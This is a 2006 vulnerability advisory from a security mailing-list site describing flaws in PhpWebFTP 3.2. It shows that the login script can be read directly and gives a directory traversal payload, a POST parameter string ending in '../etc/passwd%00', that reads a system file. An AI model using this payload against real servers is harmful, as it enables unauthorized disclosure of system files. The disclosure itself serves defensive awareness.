Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  - PHPGraphy <= 0.9.11 "editwelcome"
unauthorized access / cross site scripting -

  MyEvent Remote File Execution And XSS Attacking

  Calendarix "yearcal.
php" XSS Attacking

  FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]

From:arko.dhar_(at)_gmail.com <arko.dhar_(at)_gmail.com>
Date:17.04.2006
Subject:PhpWebFTP 3.2 Login Script


Summary
===============================================
phpWebFTP enables connections to FTP servers, even behind a firewall not allowing traffic. phpWebFTP bypasses the firewall by making a FTP connection from your webserver to the FTP server and transfering the files to your webclient over the http protocol

===========================================

Issue :
Well I have found that most of the sites that use phpwebftp v3.2 > less  have a problem. The user login script is a javascript file called script.js. This file validates the user input in the logon box. But to my surprise this file is directly accessed by web browser . The  disclosure of the source code can help an attacker to trigger    code injections .

Exploit :
http://www.anysite.com/PhpWebFtp/include/script.js

Further a directory traversal is possible via malicious arguments passed on the web browser using POST Method relative to the path of phpWebftp ie. http://www.anysite.com/PhpWebFtp/index.php? .

'server=1&port=21&goPassive=on&user=1&password=1&language
=../../../../../../../../etc/passwd%00'

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server